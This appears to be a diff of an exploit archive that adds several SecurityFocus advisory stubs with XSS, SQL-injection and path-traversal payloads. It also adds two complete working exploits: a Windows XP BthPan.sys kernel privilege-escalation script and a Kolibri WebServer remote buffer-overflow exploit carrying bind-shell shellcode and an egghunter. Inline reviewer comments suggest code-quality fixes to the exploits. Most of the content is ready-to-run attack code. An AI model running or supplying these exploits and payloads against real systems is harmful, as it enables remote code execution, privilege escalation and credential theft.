http://www.example.com/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40834/info
Yamamah Photo Gallery is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Yamamah 1.00 is vulnerable; other versions may also be affected.
http://www.example.com/themes/default/download.php?dfownload=../../includes/config.inc.php

10
platforms/php/webapps/34140.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40838/info
AneCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
AneCMS 1.3 is vulnerable; other versions may also be affected.
hello <script>alert(document.cookie)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40840/info
AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AneCMS 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63

10
platforms/php/webapps/34142.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40841/info
MODx is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MODx 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/manager/index.php?id=4%27+ANY_SQL&a=16
http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40860/info
The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URI is available:
http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]

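--- a/platforms/php/webapps/34146.txt
+++ b/platforms/php/webapps/34146.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/40869/info
+Sell@Site PHP Online Jobs is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+The following example data are available:
+Username: a' or '1'='1
+Password: a' or '1'='1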


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40880/info
JForum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
JForum 2.1.8 is vulnerable; other versions may also be affected.
http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=â?<3F>><script src=â?<3F>http://example.org/test.jsâ?<3F>></script><div

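--- a/platforms/unix/dos/34145.txt
+++ b/platforms/unix/dos/34145.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40863/info
+The 'audioop' module for Python is prone to a memory-corruption vulnerability.
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+$ python -c "import audioop; audioop.reverse('X', 2)"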

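--- a/platforms/windows/local/34131.py
+++ b/platforms/windows/local/34131.py
@@ -0,0 +1,226 @@
+"""
+Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
+Advisory ID: KL-001-2014-002
+Publication Date: 2014-07-18
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt
+1. Vulnerability Details
+Affected Vendor: Microsoft
+Affected Product: Bluetooth Personal Area Networking
+Affected Versions: 5.1.2600.5512
+Platform: Microsoft Windows XP SP3
+CWE Classification: CWE-123: Write-what-where Condition
+Impact: Privilege Escalation
+Attack vector: IOCTL
+CVE ID: CVE-2014-4971
+2. Vulnerability Description
+A vulnerability within the BthPan module allows an attacker to
+inject memory they control into an arbitrary location they
+define. This can be used by an attacker to overwrite
+HalDispatchTable+0x4 and execute arbitrary code by subsequently
+calling NtQueryIntervalProfile.
+3. Technical Description
+A userland process can create a handle into the BthPan device
+and subsequently make DeviceIoControlFile() calls into that
+device. During the IRP handler routine for 0x0012b814 the user
+provided OutputBuffer address is not validated. This allows an
+attacker to specify an arbitrary address and write
+(or overwrite) the memory residing at the specified address.
+This is classicaly known as a write-what-where vulnerability and
+has well known exploitation methods associated with it.
+A stack trace from our fuzzing can be seen below. In our fuzzing
+testcase, the specified OutputBuffer in the DeviceIoControlFile()
+call is 0xffff0000.
+STACK_TEXT:
+b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
+b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
+b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
+b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
+b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
+b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
+b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
+b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
+b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
+b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
+b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
+b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
+b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
+b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
+b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
+b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
+b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
+b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
+WARNING: Stack unwind information not available. Following frames may be wrong.
+Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
+command shows the fault originating in the bthpan driver.
+FOLLOWUP_IP:
+bthpan!BthpanReqAdd+16b
+b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)
+Reviewing the TRAP_FRAME at the time of crash we can see
+IopCompleteRequest() copying data from InputBuffer into the
+OutputBuffer. InputBuffer is another parameter provided to the
+DeviceIoControlFile() function and is therefore controllable by
+the attacker. The edi register contains the invalid address
+provided during the fuzz testcase.
+TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)
+ErrCode = 00000002
+eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
+eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy
+cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203
+nt!IopCompleteRequest+0x92:
+804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+A write-what-where vulnerability can be leveraged to obtain
+escalated privileges. To do so, an attacker will need to
+allocate memory in userland that is populated with shellcode
+designed to find the Token for PID 4 (System) and then overwrite
+the token for its own process. By leveraging the vulnerability
+in BthPan it is then possible to overwrite the pointer at
+HalDispatchTable+0x4 with a pointer to our shellcode. Calling
+NtQueryIntervalProfile() will subsequently call
+HalDispatchTable+0x4, execute our shellcode, and elevate the
+privilege of the exploit process.
+4. Mitigation and Remediation Recommendation
+None. A patch is not likely to be forthcoming from the vendor.
+5. Credit
+This vulnerability was discovered by Matt Bergin of KoreLogic
+Security, Inc.
+6. Disclosure Timeline
+2014.04.28 - Initial contact; sent Microsoft report and PoC.
+2014.04.28 - Microsoft acknowledges receipt of vulnerability
+report; states XP is no longer supported and asks if
+the vulnerability affects other versions of Windows.
+2014.04.29 - KoreLogic asks Microsoft for clarification of their
+support policy for XP.
+2014.04.29 - Microsoft says XP-only vulnerabilities will not be
+addressed with patches.
+2014.04.29 - KoreLogic asks if Microsoft intends to address the
+vulnerability report.
+2014.04.29 - Microsoft opens case to investigate the impact of the
+vulnerability on non-XP systems.
+2014.05.06 - Microsoft asks again if this vulnerability affects
+non-XP systems.
+2014.05.14 - KoreLogic informs Microsoft that the vulnerability
+report is for XP and other Windows versions have not
+been examined.
+2014.06.11 - KoreLogic informs Microsoft that 30 business days have
+passed since vendor acknowledgement of the initial
+report. KoreLogic requests CVE number for the
+vulnerability, if there is one. KoreLogic also
+requests vendor's public identifier for the
+vulnerability along with the expected disclosure date.
+2014.06.11 - Microsoft informs KoreLogic that the vulnerability
+does not impact any "up-platform" products. Says they
+are investigating embedded platforms. Does not provide
+CVE number.
+2014.06.24 - Microsoft contacts KoreLogic to say that they confused
+the report of this vulnerability with another and that
+they cannot reproduce the described behavior.
+Microsoft asks for an updated Proof-of-Concept, crash
+dumps or any further analysis of the vulnerability
+that KoreLogic can provide.
+2014.06.25 - KoreLogic provides Microsoft with an updated
+Proof-of-Concept which demonstrates using the
+vulnerability to spawn a system shell.
+2014.06.30 - KoreLogic asks Microsoft for confirmation of their
+receipt of the updated PoC. Also requests that a CVE
+ID be issued for this vulnerability.
+2014.07.02 - 45 business days have elapsed since Microsoft
+acknowledged receipt of the vulnerability report and
+PoC.
+2014.07.07 - KoreLogic requests CVE from MITRE.
+2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be
+identical to KL-001-2014-003 and issues CVE-2014-4971
+for both vulnerabilities.
+2014.07.18 - Public disclosure.
+7. Proof of Concept
+"""
+#!/usr/bin/python2
+#
+# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
+# Matt Bergin (KoreLogic / Smash the Stack)
+# CVE-2014-4971
+#
+from ctypes import *
+from struct import pack
+from os import getpid,system
+from sys import exit
+EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
+GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
+INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
+# thanks to offsec for the concept
+# I re-wrote the code as to not fully insult them
+def getBase(name=None):
+retArray = c_ulong*1024
+ImageBase = retArray()
+callback = c_int(1024)
+cbNeeded = c_long()
+EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
+for base in ImageBase:
+driverName = c_char_p("\x00"*1024)
+GetDeviceDriverBaseNameA(base,driverName,48)
+if (name):
+if (driverName.value.lower() == name):
+return base
+else:
+return (base,driverName.value)
+return None
+handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
+if (handle == INVALID_HANDLE_VALUE):
+print "[!] Could not open handle to BthPan"
+exit(1)
+NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
+buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
+WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
+WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
+kBase,kVer = getBase()
+hKernel = LoadLibraryExA(kVer,0,1)
+HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
+HalDispatchTable -= hKernel
+HalDispatchTable += kBase
+HalDispatchTable += 0x4
+DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
+CloseHandle(handle)
+NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
+exit(0)
+"""
+The contents of this advisory are copyright(c) 2014 KoreLogic, Inc.
+and are licensed under a Creative Commons Attribution Share-Alike 4.0
+(United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+KoreLogic, Inc. is a founder-owned and operated company with a proven
+track record of providing security services to entities ranging from
+Fortune 500 to small and mid-sized companies. We are a highly skilled
+team of senior security consultants doing by-hand security assessments
+for the most important networks in the U.S. and around the world. We
+are also developers of various tools and resources aimed at helping
+the security community.
+https://www.korelogic.com/about-korelogic.html
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
+"""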
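Review bot: The `#!/usr/bin/python2` shebang sits after the advisory docstring, so the loader never sees it and the file is not directly executable; it must be the first line, with the docstring following it. The IOCTL code named in the technical description (`0x0012b814`) differs from the one passed to `DeviceIoControlFile` (`0x0012d814`); one of the two is a typo and the header comment should say which value is the one that was tested. The return values of `NtAllocateVirtualMemory` and both `WriteProcessMemory` calls are never checked, so a failed allocation or copy still proceeds to the kernel write and the `NtQueryIntervalProfile` call and ends in a system crash rather than a clean abort; check each status and `exit(1)` with a message, as is already done for the `CreateFileA` handle. `pack`, `getpid` and `system` are imported but never used and can be dropped.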

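--- a/platforms/windows/remote/34059.py
+++ b/platforms/windows/remote/34059.py
@@ -0,0 +1,118 @@
+#!/usr/bin/python
+# Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit
+# Exploit Author : Revin Hadi S
+# Date : 14/07/2014
+# Vendor : http://www.senkas.com
+# Version : 2.0
+# Tested on : Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
+import socket, sys
+help = """Kolibri WebServer 2.0 Get Request SEH Exploit
+Target
+[1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
+[2]Windows 7 SP1 Eng
+Usage : %s [rhost] [port] [target]""" %sys.argv[0]
+try:
+script, rhost, port, target = sys.argv
+except ValueError:
+print help
+exit()
+try:
+port = int(port)
+target = int(target)
+except ValueError:
+print "Port & Target should number !"
+exit()
+#msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
+shellcode = ("\x89\xe2\xd9\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x39\x6c\x79\x78\x6f\x79\x75\x50\x57\x70\x53\x30\x65\x30\x6f"
+"\x79\x68\x65\x50\x31\x69\x42\x71\x74\x6c\x4b\x43\x62\x46\x50"
+"\x6e\x6b\x61\x42\x74\x4c\x6c\x4b\x66\x32\x35\x44\x4e\x6b\x33"
+"\x42\x64\x68\x66\x6f\x6c\x77\x51\x5a\x37\x56\x75\x61\x79\x6f"
+"\x30\x31\x49\x50\x6e\x4c\x65\x6c\x73\x51\x53\x4c\x45\x52\x46"
+"\x4c\x67\x50\x49\x51\x48\x4f\x56\x6d\x53\x31\x38\x47\x39\x72"
+"\x4a\x50\x72\x72\x36\x37\x4e\x6b\x62\x72\x54\x50\x6c\x4b\x43"
+"\x72\x55\x6c\x36\x61\x6e\x30\x6e\x6b\x33\x70\x72\x58\x6e\x65"
+"\x39\x50\x52\x54\x50\x4a\x47\x71\x6e\x30\x32\x70\x4c\x4b\x72"
+"\x68\x35\x48\x4e\x6b\x50\x58\x45\x70\x45\x51\x4e\x33\x6d\x33"
+"\x35\x6c\x43\x79\x4c\x4b\x64\x74\x4c\x4b\x57\x71\x49\x46\x55"
+"\x61\x79\x6f\x50\x31\x6f\x30\x4e\x4c\x39\x51\x48\x4f\x44\x4d"
+"\x37\x71\x59\x57\x64\x78\x79\x70\x53\x45\x69\x64\x76\x63\x33"
+"\x4d\x79\x68\x37\x4b\x53\x4d\x45\x74\x30\x75\x58\x62\x30\x58"
+"\x4c\x4b\x31\x48\x67\x54\x36\x61\x78\x53\x53\x56\x6c\x4b\x74"
+"\x4c\x50\x4b\x4c\x4b\x53\x68\x47\x6c\x36\x61\x48\x53\x6c\x4b"
+"\x76\x64\x4c\x4b\x73\x31\x4a\x70\x4b\x39\x33\x74\x61\x34\x47"
+"\x54\x33\x6b\x71\x4b\x70\x61\x50\x59\x52\x7a\x50\x51\x4b\x4f"
+"\x6d\x30\x31\x48\x43\x6f\x53\x6a\x6c\x4b\x66\x72\x38\x6b\x6c"
+"\x46\x53\x6d\x70\x68\x34\x73\x36\x52\x33\x30\x53\x30\x52\x48"
+"\x72\x57\x50\x73\x45\x62\x53\x6f\x76\x34\x51\x78\x72\x6c\x62"
+"\x57\x46\x46\x47\x77\x79\x6f\x78\x55\x78\x38\x4e\x70\x35\x51"
+"\x45\x50\x53\x30\x35\x79\x6a\x64\x31\x44\x76\x30\x71\x78\x61"
+"\x39\x6d\x50\x50\x6b\x35\x50\x49\x6f\x6a\x75\x32\x70\x30\x50"
+"\x72\x70\x66\x30\x61\x50\x36\x30\x31\x50\x50\x50\x51\x78\x68"
+"\x6a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x38\x55\x4b\x39\x38\x47"
+"\x44\x71\x79\x4b\x43\x63\x31\x78\x37\x72\x67\x70\x52\x36\x47"
+"\x32\x6f\x79\x4a\x46\x72\x4a\x72\x30\x46\x36\x50\x57\x52\x48"
+"\x79\x52\x79\x4b\x74\x77\x30\x67\x59\x6f\x58\x55\x46\x33\x61"
+"\x47\x53\x58\x6e\x57\x69\x79\x65\x68\x59\x6f\x59\x6f\x69\x45"
+"\x46\x33\x30\x53\x76\x37\x50\x68\x74\x34\x78\x6c\x47\x4b\x48"
+"\x61\x6b\x4f\x4a\x75\x43\x67\x4d\x59\x38\x47\x65\x38\x61\x65"
+"\x70\x6e\x70\x4d\x61\x71\x79\x6f\x39\x45\x70\x68\x31\x73\x50"
+"\x6d\x31\x74\x67\x70\x6f\x79\x39\x73\x32\x77\x52\x77\x70\x57"
+"\x66\x51\x68\x76\x73\x5a\x54\x52\x46\x39\x63\x66\x69\x72\x69"
+"\x6d\x61\x76\x4a\x67\x33\x74\x76\x44\x65\x6c\x55\x51\x73\x31"
+"\x6c\x4d\x43\x74\x31\x34\x32\x30\x4a\x66\x67\x70\x57\x34\x56"
+"\x34\x36\x30\x30\x56\x56\x36\x30\x56\x43\x76\x42\x76\x32\x6e"
+"\x71\x46\x36\x36\x70\x53\x46\x36\x55\x38\x33\x49\x78\x4c\x37"
+"\x4f\x6b\x36\x49\x6f\x49\x45\x4b\x39\x59\x70\x50\x4e\x31\x46"
+"\x50\x46\x49\x6f\x50\x30\x42\x48\x36\x68\x4e\x67\x35\x4d\x73"
+"\x50\x6b\x4f\x59\x45\x6f\x4b\x4c\x30\x48\x35\x4f\x52\x33\x66"
+"\x63\x58\x6d\x76\x5a\x35\x6f\x4d\x6f\x6d\x69\x6f\x58\x55\x77"
+"\x4c\x63\x36\x33\x4c\x56\x6a\x6b\x30\x69\x6b\x4d\x30\x53\x45"
+"\x45\x55\x4f\x4b\x70\x47\x52\x33\x44\x32\x52\x4f\x51\x7a\x63"
+"\x30\x66\x33\x6b\x4f\x78\x55\x41\x41")
+#egghunter's tag : doge
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+if target == 1:
+buff = 792
+elif target == 2:
+buff = 794
+else:
+print "Input Target option's number !"
+exit()
+buffer = "\x90"*(buff-20-32-4)
+buffer += egghunter
+buffer += "\x90"*20
+buffer += "\xEB\xBA\x90\x90"
+buffer += "\xC2\x15\x40" #/p/p/r kolibri.exe
+eggshell = "dogedoge"+shellcode
+evil = (
+"GET /"+buffer+" HTTP/1.1\r\n"
+"Host: "+eggshell+"\r\n"
+"User-Agent: kepo\r\n"
+"Connection: close\r\n\r\n")
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+s.connect((rhost, port))
+except socket.error:
+print "[!]Host down or unreachable !"
+exit()
+s.send(evil)
+s.close()
+print "Exploit sended ! Wait a minute the egghunter may take a while to find the tag..."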
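Review bot: `help` (the usage text) and `buffer` (the request body) shadow Python builtins; renaming them, e.g. `usage` and `payload`, avoids confusion and linter warnings without changing behaviour. The per-target values `792` and `794` are undocumented magic numbers, and the header's tested-platform list (`Windows Server 2003 Eng`) does not agree with the usage text (`Windows 2003 SP2 Eng`); a one-line comment on each value naming the build it was measured against, and a single consistent platform list in both places, would help readers judge applicability. The final status line also has a typo: `"Exploit sent! Wait a minute, the egghunter may take a while to find the tag..."`.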


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40852/info
XnView is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Versions prior to XnView 1.97.5 are vulnerable.
http://www.exploit-db.com/sploits/34143.rar